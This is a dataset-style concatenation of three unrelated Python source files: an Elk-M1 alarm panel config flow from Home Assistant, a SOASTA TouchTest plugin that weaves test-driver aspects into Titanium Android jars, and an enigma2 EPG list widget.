vol.Optional(CONF_USERNAME, default=""): str,
vol.Optional(CONF_PASSWORD, default=""): str,
vol.Optional(CONF_PREFIX, default=""): str,
vol.Optional(CONF_TEMPERATURE_UNIT, default=TEMP_FAHRENHEIT): vol.In(
[TEMP_FAHRENHEIT, TEMP_CELSIUS]
),
}
)
VALIDATE_TIMEOUT = 35
async def validate_input(data):
"""Validate the user input allows us to connect.
Data has the keys from DATA_SCHEMA with values provided by the user.
"""
userid = data.get(CONF_USERNAME)
password = data.get(CONF_PASSWORD)
prefix = data[CONF_PREFIX]
url = _make_url_from_data(data)
requires_password = url.startswith("elks://")
if requires_password and (not userid or not password):
raise InvalidAuth
elk = elkm1.Elk(
{"url": url, "userid": userid, "password": password, "element_list": ["panel"]}
)
elk.connect()
if not await async_wait_for_elk_to_sync(elk, VALIDATE_TIMEOUT, url):
raise InvalidAuth
device_name = data[CONF_PREFIX] if data[CONF_PREFIX] else "ElkM1"
# Return info that you want to store in the config entry.
return {"title": device_name, CONF_HOST: url, CONF_PREFIX: slugify(prefix)}
def _make_url_from_data(data):
host = data.get(CONF_HOST)
if host:
return host
protocol = PROTOCOL_MAP[data[CONF_PROTOCOL]]
address = data[CONF_ADDRESS]
return f"{protocol}{address}"
class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow for Elk-M1 Control."""
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_LOCAL_PUSH
def __init__(self):
"""Initialize the elkm1 config flow."""
self.importing = False
async def async_step_user(self, user_input=None):
"""Handle the initial step."""
errors = {}
if user_input is not None:
if self._url_already_configured(_make_url_from_data(user_input)):
return self.async_abort(reason="address_already_configured")
try:
info = await validate_input(user_input)
except asyncio.TimeoutError:
errors["base"] = "cannot_connect"
except InvalidAuth:
errors["base"] = "invalid_auth"
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Unexpected exception")
errors["base"] = "unknown"
if "base" not in errors:
await self.async_set_unique_id(user_input[CONF_PREFIX])
self._abort_if_unique_id_configured()
if self.importing:
return self.async_create_entry(title=info["title"], data=user_input)
return self.async_create_entry(
title=info["title"],
data={
CONF_HOST: info[CONF_HOST],
CONF_USERNAME: user_input[CONF_USERNAME],
CONF_PASSWORD: user_input[CONF_PASSWORD],
CONF_AUTO_CONFIGURE: True,
CONF_TEMPERATURE_UNIT: user_input[CONF_TEMPERATURE_UNIT],
CONF_PREFIX: info[CONF_PREFIX],
},
)
return self.async_show_form(
step_id="user", data_schema=DATA_SCHEMA, errors=errors
)
async def async_step_import(self, user_input):
"""Handle import."""
self.importing = True
return await self.async_step_user(user_input)
def _url_already_configured(self, url):
"""See if we already have a elkm1 matching user input configured."""
existing_hosts = {
urlparse(entry.data[CONF_HOST]).hostname
for entry in self._async_current_entries()
}
return urlparse(url).hostname in existing_hosts
class InvalidAuth(exceptions.HomeAssistantError):
"""Error to indicate there is invalid auth."""
|
jdinsh/MyClientMap
|
refs/heads/master
|
plugins/com.soasta.touchtest.android/plugin.py
|
23
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, sys, subprocess, hashlib, time, shutil, zipfile
from time import sleep
from os import listdir
from os.path import isfile, join
def compile(c):
global project_dir
global sdk_dir
global deploy_type
global builder
global android
global config
global template_dir
global jar_dir
global touchtest_dir
global restore_performed
global classpath_separator
global moduleAvailable
global touchtest_module_dir_created
global blacklist
print "[DEBUG] TouchTest : %s" % c
config = c
# This Plugin is only for the Android platform.
if config['platform'] != 'android':
return
moduleAvailable = isAndroidModuleEnabled(config['tiapp'].properties['modules'], config['deploy_type'])
touchtest_module_dir_created = []
if moduleAvailable:
from android import Android
from compiler import Compiler
# Initialize variables
project_dir = config['project_dir']
sdk_dir = config['titanium_dir']
deploy_type = config['deploy_type']
template_dir = config['template_dir']
touchtest_dir = project_dir + "/plugins/com.soasta.touchtest.android"
jar_dir = touchtest_dir + "/lib/"
# Initialize blacklist
blacklist = getBlackList()
# print "[DEBUG] TouchTest : Blacklist is " + blacklist
# Initialize the restore_performed value to be False
restore_performed = False
# Initialize classpath
builder = config['android_builder']
android = Android(builder.name, builder.app_id, builder.sdk, 'test', builder.java)
full_resource_dir = os.path.join(builder.project_dir, builder.project_dir + "/bin/assets/Resources")
compiler = Compiler(config['tiapp'],
full_resource_dir,
builder.java,
project_dir + "/bin/Classes",
builder.project_gen_dir,
project_dir,
include_all_modules=True)
classpath = os.pathsep.join([builder.sdk.get_android_jar(), os.pathsep.join(compiler.jar_libraries)])
# Classpath separator on Windows is a semi-colon instead of a colon
classpath_separator = ":"
if (os.name == 'nt'):
classpath_separator = ";"
module_jars = findAndroidModuleJars(config['tiapp'].properties['modules'])
classpath = classpath + classpath_separator + jar_dir + "aspectjrt.jar"
classpath = classpath + classpath_separator + jar_dir + "aspectjtools.jar"
for module_jar in module_jars:
print "[DEBUG] TouchTest : Will also process %s" % module_jar
classpath = classpath + classpath_separator + module_jar
print "[DEBUG] TouchTest : Installing TouchTest Driver for Android"
print "[DEBUG] TouchTest : Preparing libraries"
print "[DEBUG] TouchTest : Using classpath %s" % classpath
createBackup("titanium")
createBackup("modules/titanium-ui")
step = 0
try:
step = 1
instrument(classpath, "titanium")
step = 2
instrument(classpath, "modules/titanium-ui")
step = 3
for module_jar in module_jars:
instrumentExternalJars(classpath, module_jar)
merge()
print "[DEBUG] TouchTest : TouchTest Driver for Android installed"
except:
print "[ERROR] TouchTest : Unexpected error:", sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2], "- step ", str(step)
print "[ERROR] TouchTest : Exception occured. Restoring Titanium jar files."
restore("titanium")
restore("modules/titanium-ui")
print "[ERROR] TouchTest : TouchTest Driver was not installed."
def postbuild():
finalize()
def findAndroidModuleJars(modules):
module_jars = []
# Iterate through all available modules
for module in modules:
# Ignore the Module if it is not for android platform
if module['platform'] != 'android':
continue
# Ignore the TouchTest module
if module['id'] == 'com.soasta.touchtest':
continue
# Ignore the module if it's been blacklisted
if blacklist is not None:
module_name = "'" + module['id'] + "'"
if module_name in blacklist:
print "[DEBUG] TouchTest : Module " + module_name + " has been blacklisted, skipping this module for processing."
continue
# Does the module support the current deploy_type?
# We need to validate that the deploy-type key actually is present in the module.
# Because deploy-type key is not present on Titanium SDK before 3.0
if 'deploy-type' in module.keys():
if not module['deploy-type'] in ['', deploy_type]:
continue
# If the module version is empty, we need to pick the most recent version available
moduleVersion = module['version']
if not module['version']:
print "[DEBUG] TouchTest : Version number for Module " + module['id'] + " was not found. Will search for the latest version."
moduleVersion = getModuleVersion(module)
if moduleVersion is None:
print "[DEBUG] TouchTest : No recent versions of Module " + module['id'] + " were found. Skipping this module."
continue
# Obtain module directory path
modulePath = getModulePath(module, moduleVersion)
if not modulePath:
print "[DEBUG] TouchTest : Module " + module['id'] + " not found, skipping the module."
continue
# We will create a copy of the module directory with a suffix .touchtest
# Thus, if the current module directory is module/1.1, the copy will be module/1.1.touchtest
module['version'] = moduleVersion + ".touchtest"
modulePathTouchTest = modulePath + ".touchtest"
# If the backup directory already exists from the previous build, clean it up now
if os.path.exists(modulePathTouchTest):
shutil.rmtree(modulePathTouchTest)
shutil.copytree(modulePath, modulePathTouchTest)
touchtest_module_dir_created.append(modulePathTouchTest)
# Set the new value of module directory (copy we just created), this will be used for weaving module jars
modulePath = modulePathTouchTest
# Find all files in the Module directory and make a list of all the jar files we need to weave
filesInModuleDir = [ file for file in listdir(modulePath) if isfile(join(modulePath,file)) ]
for file in filesInModuleDir:
fileName, fileExtension = os.path.splitext(file)
if fileExtension == ".jar":
module_jars.append(modulePath + "/" + str(file))
# Find all files in the module/lib directory and append all jar files to the list of jar files we need to weave
libDir = modulePath + "/lib"
if os.path.exists(libDir):
filesInLibDir = [ file for file in listdir(libDir) if isfile(join(libDir,file)) ]
for file in filesInLibDir:
fileName, fileExtension = os.path.splitext(file)
if fileExtension == ".jar":
module_jars.append(libDir + "/" + str(file))
if not os.path.exists(modulePathTouchTest):
os.makedirs(modulePathTouchTest)
# Return the list of jar file we need to weave
return module_jars
def getModuleVersion(module):
# The idea here is to find the most recent version of the module present either in Project
# directory or the SDK directory
# So we will iterate both project and SDK directories and return the most recent version
moduleDir = "/modules/android/" + module['id']
versionDirList = []
# Iterate through the module directory in project directory
modulePath = project_dir + moduleDir
# Build a list of all available versions
if os.path.exists(modulePath):
versionDirList = os.listdir(modulePath)
# Iterate through the module directory in SDK directory
modulePath = sdk_dir + moduleDir
# Build a list of all available versions
if os.path.exists(modulePath):
versionDirList = versionDirList + os.listdir(modulePath)
# Compare the major and minor version numbers with the latestVersion in store
# and return the most recent version we find
latestVersion = "0.0.0.0.0"
for filename in versionDirList:
versionNumbersList = filename.split('.')
latestVersionNumbersList = latestVersion.split('.')
for index in range(0, len(versionNumbersList)):
try:
if int(versionNumbersList[index]) > int(latestVersionNumbersList[index]):
latestVersion = filename
break
elif int(versionNumbersList[index]) < int(latestVersionNumbersList[index]):
break
elif int(versionNumbersList[index]) == int(latestVersionNumbersList[index]):
continue
except ValueError:
# If the directory name does not represent a version number, integer parsing will fail
# We should skip the directory and continue
continue
# Return the latest version
if latestVersion.split('.')[0] == "0":
print "[DEBUG] TouchTest : No versions found for module " + module['id']
return None
else:
print "[DEBUG] TouchTest : Latest Version for module " + module['id'] + " is " + latestVersion
return latestVersion
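# Worked example of the comparison above (added comments, not part of the
# original plugin): for version directories "1.2" and "1.10" the loop
# compares components as integers, so 10 > 2 makes "1.10" the latest,
# whereas a plain string comparison would wrongly prefer "1.2".
# Non-numeric directory names raise ValueError and are skipped.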
def getModulePath(module, moduleVersion):
# Create the module directory path assuming its in the project directory
moduleDir = "/modules/android/" + module['id'] + "/" + moduleVersion
modulePath = project_dir + moduleDir
# Check if the module actually exists in the project directory
if not os.path.exists(modulePath):
print "[DEBUG] TouchTest : Module " + module['id'] + " does not exist in the Project directory."
# Module does not exist in the project directory, try the SDK directory
modulePath = sdk_dir + moduleDir
# If the module doesn't exist in SDK directory either, skip it and continue
if not os.path.exists(modulePath):
return None
else:
print "[DEBUG] TouchTest : Module " + module['id'] + " found in the SDK directory."
return modulePath
else:
return modulePath
def finalize():
global restore_performed
# This Plugin is only for the Android platform.
if config['platform'] != 'android':
return
if moduleAvailable and restore_performed == False:
print "[DEBUG] TouchTest : Restoring files changed during build."
for dir in touchtest_module_dir_created:
if os.path.exists(dir):
shutil.rmtree(dir)
restore("titanium")
restore("modules/titanium-ui")
restore_performed = True
print "[DEBUG] TouchTest : The application is now TouchTest ready."
def createBackup(jar):
jar_file = template_dir + "/" + jar + ".jar"
jar_bak_file = jar_file + ".bak"
if not os.path.exists(jar_bak_file):
print "[DEBUG] TouchTest : Creating backup of file: {file}".format(file=jar_file)
shutil.copy(jar_file, jar_bak_file)
else:
print "[DEBUG] TouchTest : Backpup already present: {file}".format(file=jar_file)
shutil.copy(jar_file + ".bak", jar_file)
def restore(jar):
jar_file = template_dir + "/" + jar + ".jar"
print "[DEBUG] TouchTest : Restoring file: {file}".format(file=jar_file)
shutil.copy(jar_file + ".bak", jar_file)
os.remove(jar_file + ".bak")
def getBlackList():
blacklist_file = touchtest_dir + "/blacklist.txt"
blacklist_mod = []
# Check to see if the file exists. This shouldn't happen but if it does, we will act as if the
# file was of size 0.
if not os.path.exists(blacklist_file):
return None
elif os.path.getsize(blacklist_file) > 0:
# Get the information out of the black list and ignore the modules with the specified names.
with open(blacklist_file) as blackListFile:
for line in blackListFile:
# Skip the comments and empty lines
if not line.strip() or line.strip().startswith("#"):
continue
blacklist_mod.append(repr(line.strip()))
# Joining the modules found into one long string to create the black list.
# This way of creating the list came from: http://www.skymind.com/~ocrow/python_string/
# which claimed that using the join was one of the fastest ways to concatenate
# strings with the flexibility needed to exclude modules that are commented out.
return ''.join(blacklist_mod)
else:
# There is nothing in the blacklist file so there's nothing to check.
return None
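# Worked example of the blacklist format (added comments, not part of the
# original plugin): a blacklist.txt containing the lines "ti.map" and
# "ti.admob" yields the string "'ti.map''ti.admob'" (repr() adds the
# quotes), and findAndroidModuleJars() then tests "'" + module_id + "'"
# for substring containment against it.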
def instrument(classpath, jar):
if not os.path.exists(template_dir + "/touchtest/"):
os.makedirs(template_dir + "/touchtest/")
inpath = template_dir + "/" + jar + ".jar.bak"
print "[DEBUG] TouchTest : Process %s " % inpath
aspectpath = jar_dir + "TouchTestDriver.jar" + classpath_separator + jar_dir + "TouchTestDriver-Titanium.jar"
outjar = template_dir + "/" + jar + ".jar"
if os.path.exists(outjar):
os.remove(outjar)
weaveJar(classpath, inpath, aspectpath, outjar)
def instrumentExternalJars(classpath, jar):
inpath = jar + ".original"
shutil.copyfile(jar, inpath)
print "[DEBUG] TouchTest : Processing %s " % jar
aspectpath = jar_dir + "TouchTestDriver.jar" + classpath_separator + jar_dir + "TouchTestDriver-Titanium.jar"
outjar = jar
if os.path.exists(outjar):
os.remove(outjar)
try:
weaveJar(classpath, inpath, aspectpath, outjar)
except:
# Jar weaving failed, restore the jar file
print "[ERROR] TouchTest : Unexpected error:", sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2]
print "[ERROR] TouchTest : Exception occured. Restoring " + jar + " file."
shutil.copyfile(inpath, jar)
if os.path.exists(inpath):
os.remove(inpath)
def weaveJar(classpath, inpath, aspectpath, outjar):
param = "-Xlint:ignore -inpath \"" + inpath + "\" -aspectpath \"" + aspectpath + "\" -outjar \"" + outjar + "\" -cp \"" + classpath + "\""
# Weave aspects into jar files
ajc = []
ajc.append("java")
ajc.append("-classpath")
ajc.append(classpath)
ajc.append("-Xmx256M")
ajc.append("org.aspectj.tools.ajc.Main")
ajc.append("-Xlint:ignore")
ajc.append("-inpath")
ajc.append(inpath)
ajc.append("-aspectpath")
ajc.append(aspectpath)
ajc.append("-outjar")
ajc.append(outjar)
print "[DEBUG] TouchTest : Using %s " % param
sys.stdout.flush()
subprocess.call(ajc)
print "[DEBUG] TouchTest : %s processed" % inpath
def mergeAll(jars, targetjar):
# Create the new temporary JAR
tmpjar = targetjar + ".tmp"
if os.path.exists(tmpjar):
os.remove(tmpjar)
with zipfile.ZipFile(tmpjar, mode='a') as zMerged:
for fname in jars:
zf = zipfile.ZipFile(fname, 'r')
for n in zf.namelist():
zMerged.writestr(n, zf.open(n).read())
if os.path.exists(targetjar):
# Remove the target JAR
os.remove(targetjar)
# Rename to tmp JAR to target JAR
shutil.move(tmpjar, targetjar)
def merge():
print "[DEBUG] TouchTest : Add TouchTest capabilities in %s" % template_dir + "/titanium.jar"
mergeAll([template_dir + "/titanium.jar",
jar_dir + "aspectjrt.jar",
jar_dir + "TouchTestDriver-APIv12.jar",
jar_dir + "TouchTestDriver-APIv11.jar",
jar_dir + "TouchTestDriver-Titanium.jar",
jar_dir + "TouchTestDriver.jar"],
template_dir + "/titanium.jar")
# Checks for the presence of TouchTest Android Module
def isAndroidModuleEnabled(modules, deploy_type):
for module in modules:
if module['platform'] == 'android' and module['id'] == 'com.soasta.touchtest':
# We need to validate that the deploy-type key actually is present in the module.
# Because deploy-type key is not present on Titanium SDK before 3.0
if 'deploy-type' in module.keys():
if module['deploy-type'] in ['', deploy_type]:
return True
else:
continue
else:
return True
return False
|
ACJTeam/enigma2
|
refs/heads/master
|
lib/python/Components/EpgList.py
|
1
|
from HTMLComponent import HTMLComponent
from GUIComponent import GUIComponent
from enigma import eEPGCache, eListbox, eListboxPythonMultiContent, gFont, RT_HALIGN_LEFT, RT_HALIGN_RIGHT, RT_HALIGN_CENTER, RT_VALIGN_CENTER
from Tools.Alternatives import CompareWithAlternatives
from Tools.LoadPixmap import LoadPixmap
from time import localtime, time
from Components.config import config
from ServiceReference import ServiceReference
from Tools.Directories import resolveFilename, SCOPE_CURRENT_SKIN
from skin import parseFont
EPG_TYPE_SINGLE = 0
EPG_TYPE_MULTI = 1
EPG_TYPE_SIMILAR = 2
class Rect:
def __init__(self, x, y, width, height):
self.x = x
self.y = y
self.w = width
self.h = height
# silly, but backward compatible
def left(self):
return self.x
def top(self):
return self.y
def height(self):
return self.h
def width(self):
return self.w
class EPGList(HTMLComponent, GUIComponent):
def __init__(self, type=EPG_TYPE_SINGLE, selChangedCB=None, timer = None):
self.days = (_("Mon"), _("Tue"), _("Wed"), _("Thu"), _("Fri"), _("Sat"), _("Sun"))
self.timer = timer
self.onSelChanged = [ ]
if selChangedCB is not None:
self.onSelChanged.append(selChangedCB)
GUIComponent.__init__(self)
self.type=type
self.l = eListboxPythonMultiContent()
self.eventItemFont = gFont("Regular", 22)
self.eventTimeFont = gFont("Regular", 16)
self.iconSize = 21
self.iconDistance = 2
self.colGap = 10
self.skinColumns = False
self.tw = 90
self.dy = 0
if type == EPG_TYPE_SINGLE:
self.l.setBuildFunc(self.buildSingleEntry)
elif type == EPG_TYPE_MULTI:
self.l.setBuildFunc(self.buildMultiEntry)
else:
assert(type == EPG_TYPE_SIMILAR)
self.l.setBuildFunc(self.buildSimilarEntry)
self.epgcache = eEPGCache.getInstance()
self.clocks = [ LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/epgclock_add.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/epgclock_pre.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/epgclock.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/epgclock_prepost.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/epgclock_post.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zapclock_add.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zapclock_pre.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zapclock.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zapclock_prepost.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zapclock_post.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zaprecclock_add.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zaprecclock_pre.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zaprecclock.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zaprecclock_prepost.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/zaprecclock_post.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repepgclock_add.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repepgclock_pre.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repepgclock.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repepgclock_prepost.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repepgclock_post.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzapclock_add.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzapclock_pre.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzapclock.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzapclock_prepost.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzapclock_post.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzaprecclock_add.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzaprecclock_pre.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzaprecclock.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzaprecclock_prepost.png')),
LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, 'skin_default/icons/repzaprecclock_post.png')) ]
def getEventFromId(self, service, eventid):
event = None
if self.epgcache is not None and eventid is not None:
event = self.epgcache.lookupEventId(service.ref, eventid)
return event
def getCurrentChangeCount(self):
if self.type == EPG_TYPE_MULTI and self.l.getCurrentSelection() is not None:
return self.l.getCurrentSelection()[0]
return 0
def getCurrent(self):
idx=0
if self.type == EPG_TYPE_MULTI:
idx += 1
tmp = self.l.getCurrentSelection()
if tmp is None:
return ( None, None )
eventid = tmp[idx+1]
service = ServiceReference(tmp[idx])
event = self.getEventFromId(service, eventid)
return ( event, service )
def moveUp(self):
self.instance.moveSelection(self.instance.moveUp)
def moveDown(self):
self.instance.moveSelection(self.instance.moveDown)
def connectSelectionChanged(self, func):
if not self.onSelChanged.count(func):
self.onSelChanged.append(func)
def disconnectSelectionChanged(self, func):
self.onSelChanged.remove(func)
def selectionChanged(self):
for x in self.onSelChanged:
if x is not None:
x()
# try:
# x()
# except: # FIXME!!!
# print "FIXME in EPGList.selectionChanged"
# pass
GUI_WIDGET = eListbox
def postWidgetCreate(self, instance):
instance.setWrapAround(True)
instance.selectionChanged.get().append(self.selectionChanged)
instance.setContent(self.l)
def preWidgetRemove(self, instance):
instance.selectionChanged.get().remove(self.selectionChanged)
instance.setContent(None)
def recalcEntrySize(self):
esize = self.l.getItemSize()
width = esize.width()
height = esize.height()
try:
self.iconSize = self.clocks[0].size().height()
except:
pass
self.space = self.iconSize + self.iconDistance
self.dy = int((height - self.iconSize)/2.)
if self.type == EPG_TYPE_SINGLE:
if self.skinColumns:
x = 0
self.weekday_rect = Rect(0, 0, self.gap(self.col[0]), height)
x += self.col[0]
self.datetime_rect = Rect(x, 0, self.gap(self.col[1]), height)
x += self.col[1]
self.descr_rect = Rect(x, 0, width-x, height)
else:
self.weekday_rect = Rect(0, 0, width/20*2-10, height)
self.datetime_rect = Rect(width/20*2, 0, width/20*5-15, height)
self.descr_rect = Rect(width/20*7, 0, width/20*13, height)
elif self.type == EPG_TYPE_MULTI:
if self.skinColumns:
x = 0
self.service_rect = Rect(x, 0, self.gap(self.col[0]), height)
x += self.col[0]
self.progress_rect = Rect(x, 8, self.gap(self.col[1]), height-16)
self.start_end_rect = Rect(x, 0, self.gap(self.col[1]), height)
x += self.col[1]
self.descr_rect = Rect(x, 0, width-x, height)
else:
xpos = 0
w = width/10*3
self.service_rect = Rect(xpos, 0, w-10, height)
xpos += w
w = width/10*2
self.start_end_rect = Rect(xpos, 0, w-10, height)
self.progress_rect = Rect(xpos, 4, w-10, height-8)
xpos += w
w = width/10*5
self.descr_rect = Rect(xpos, 0, width, height)
else: # EPG_TYPE_SIMILAR
if self.skinColumns:
x = 0
self.weekday_rect = Rect(0, 0, self.gap(self.col[0]), height)
x += self.col[0]
self.datetime_rect = Rect(x, 0, self.gap(self.col[1]), height)
x += self.col[1]
self.service_rect = Rect(x, 0, width-x, height)
else:
self.weekday_rect = Rect(0, 0, width/20*2-10, height)
self.datetime_rect = Rect(width/20*2, 0, width/20*5-15, height)
self.service_rect = Rect(width/20*7, 0, width/20*13, height)
def gap(self, width):
return width - self.colGap
def getClockTypesForEntry(self, service, eventId, beginTime, duration):
if not beginTime:
return None
rec = self.timer.isInTimer(eventId, beginTime, duration, service)
if rec is not None:
return rec[1]
else:
return None
def buildSingleEntry(self, service, eventId, beginTime, duration, EventName):
clock_types = self.getClockTypesForEntry(service, eventId, beginTime, duration)
r1=self.weekday_rect
r2=self.datetime_rect
r3=self.descr_rect
t = localtime(beginTime)
res = [
None, # no private data needed
(eListboxPythonMultiContent.TYPE_TEXT, r1.x, r1.y, r1.w, r1.h, 0, RT_HALIGN_RIGHT|RT_VALIGN_CENTER, self.days[t[6]]),
(eListboxPythonMultiContent.TYPE_TEXT, r2.x, r2.y, r2.w, r1.h, 0, RT_HALIGN_RIGHT|RT_VALIGN_CENTER, "%2d.%02d, %02d:%02d"%(t[2],t[1],t[3],t[4]))
]
if clock_types:
for i in range(len(clock_types)):
res.append((eListboxPythonMultiContent.TYPE_PIXMAP_ALPHATEST, r3.x + i * self.space, r3.y + self.dy, self.iconSize, self.iconSize, self.clocks[clock_types[i]]))
res.append((eListboxPythonMultiContent.TYPE_TEXT, r3.x + (i + 1) * self.space, r3.y, r3.w, r3.h, 0, RT_HALIGN_LEFT|RT_VALIGN_CENTER, EventName))
else:
res.append((eListboxPythonMultiContent.TYPE_TEXT, r3.x, r3.y, r3.w, r3.h, 0, RT_HALIGN_LEFT|RT_VALIGN_CENTER, EventName))
return res
def buildSimilarEntry(self, service, eventId, beginTime, service_name, duration):
clock_types = self.getClockTypesForEntry(service, eventId, beginTime, duration)
r1=self.weekday_rect
r2=self.datetime_rect
r3=self.service_rect
t = localtime(beginTime)
res = [
None, # no private data needed
(eListboxPythonMultiContent.TYPE_TEXT, r1.x, r1.y, r1.w, r1.h, 0, RT_HALIGN_RIGHT|RT_VALIGN_CENTER, self.days[t[6]]),
(eListboxPythonMultiContent.TYPE_TEXT, r2.x, r2.y, r2.w, r1.h, 0, RT_HALIGN_RIGHT|RT_VALIGN_CENTER, "%2d.%02d, %02d:%02d"%(t[2],t[1],t[3],t[4]))
]
if clock_types:
for i in range(len(clock_types)):
res.append((eListboxPythonMultiContent.TYPE_PIXMAP_ALPHATEST, r3.x + i * self.space, r3.y + self.dy, self.iconSize, self.iconSize, self.clocks[clock_types[i]]))
res.append((eListboxPythonMultiContent.TYPE_TEXT, r3.x + (i + 1) * self.space, r3.y, r3.w, r3.h, 0, RT_HALIGN_LEFT|RT_VALIGN_CENTER, service_name))
else:
res.append((eListboxPythonMultiContent.TYPE_TEXT, r3.x, r3.y, r3.w, r3.h, 0, RT_HALIGN_LEFT|RT_VALIGN_CENTER, service_name))
return res
def buildMultiEntry(self, changecount, service, eventId, beginTime, duration, EventName, nowTime, service_name):
clock_types = self.getClockTypesForEntry(service, eventId, beginTime, duration)
r1=self.service_rect
r2=self.progress_rect
r3=self.descr_rect
r4=self.start_end_rect
res = [ None ] # no private data needed
if clock_types:
res.append((eListboxPythonMultiContent.TYPE_TEXT, r1.x, r1.y, r1.w - self.space * len(clock_types), r1.h, 0, RT_HALIGN_LEFT|RT_VALIGN_CENTER, service_name))
for i in range(len(clock_types)):
res.append((eListboxPythonMultiContent.TYPE_PIXMAP_ALPHATEST, r1.x + r1.w - self.space * (i + 1), r1.y + self.dy, self.iconSize, self.iconSize, self.clocks[clock_types[len(clock_types) - 1 - i]]))
else:
res.append((eListboxPythonMultiContent.TYPE_TEXT, r1.x, r1.y, r1.w, r1.h, 0, RT_HALIGN_LEFT|RT_VALIGN_CENTER, service_name))
if beginTime is not None:
if nowTime < beginTime:
begin = localtime(beginTime)
end = localtime(beginTime+duration)
res.extend((
(eListboxPythonMultiContent.TYPE_TEXT, r4.x, r4.y, r4.w, r4.h, 1, RT_HALIGN_CENTER|RT_VALIGN_CENTER, "%02d.%02d - %02d.%02d"%(begin[3],begin[4],end[3],end[4])),
(eListboxPythonMultiContent.TYPE_TEXT, r3.x, r3.y, self.gap(self.tw), r3.h, 1, RT_HALIGN_RIGHT|RT_VALIGN_CENTER, _("%d min") % (duration / 60)),
(eListboxPythonMultiContent.TYPE_TEXT, r3.x + self.tw, r3.y, r3.w, r3.h, 0, RT_HALIGN_LEFT, EventName)
))
else:
percent = (nowTime - beginTime) * 100 / duration
prefix = "+"
remaining = ((beginTime+duration) - int(time())) / 60
if remaining <= 0:
prefix = ""
res.extend((
(eListboxPythonMultiContent.TYPE_PROGRESS, r2.x, r2.y, r2.w, r2.h, percent),
(eListboxPythonMultiContent.TYPE_TEXT, r3.x, r3.y, self.gap(self.tw), r3.h, 1, RT_HALIGN_RIGHT|RT_VALIGN_CENTER, _("%s%d min") % (prefix, remaining)),
(eListboxPythonMultiContent.TYPE_TEXT, r3.x + self.tw, r3.y, r3.w, r3.h, 0, RT_HALIGN_LEFT, EventName)
))
return res
def queryEPG(self, list, buildFunc=None):
if self.epgcache is not None:
if buildFunc is not None:
return self.epgcache.lookupEvent(list, buildFunc)
else:
return self.epgcache.lookupEvent(list)
return [ ]
def fillMultiEPG(self, services, stime=-1):
#t = time()
test = [ (service.ref.toString(), 0, stime) for service in services ]
test.insert(0, 'X0RIBDTCn')
self.list = self.queryEPG(test)
self.l.setList(self.list)
#print time() - t
self.selectionChanged()
def updateMultiEPG(self, direction):
#t = time()
test = [ x[3] and (x[1], direction, x[3]) or (x[1], direction, 0) for x in self.list ]
test.insert(0, 'XRIBDTCn')
tmp = self.queryEPG(test)
cnt=0
for x in tmp:
changecount = self.list[cnt][0] + direction
if changecount >= 0:
if x[2] is not None:
self.list[cnt]=(changecount, x[0], x[1], x[2], x[3], x[4], x[5], x[6])
cnt+=1
self.l.setList(self.list)
#print time() - t
self.selectionChanged()
def fillSingleEPG(self, service):
t = time()
epg_time = t - config.epg.histminutes.getValue()*60
test = [ 'RIBDT', (service.ref.toString(), 0, epg_time, -1) ]
self.list = self.queryEPG(test)
self.l.setList(self.list)
if t != epg_time:
idx = 0
for x in self.list:
idx += 1
if t < x[2]+x[3]:
break
self.instance.moveSelectionTo(idx-1)
self.selectionChanged()
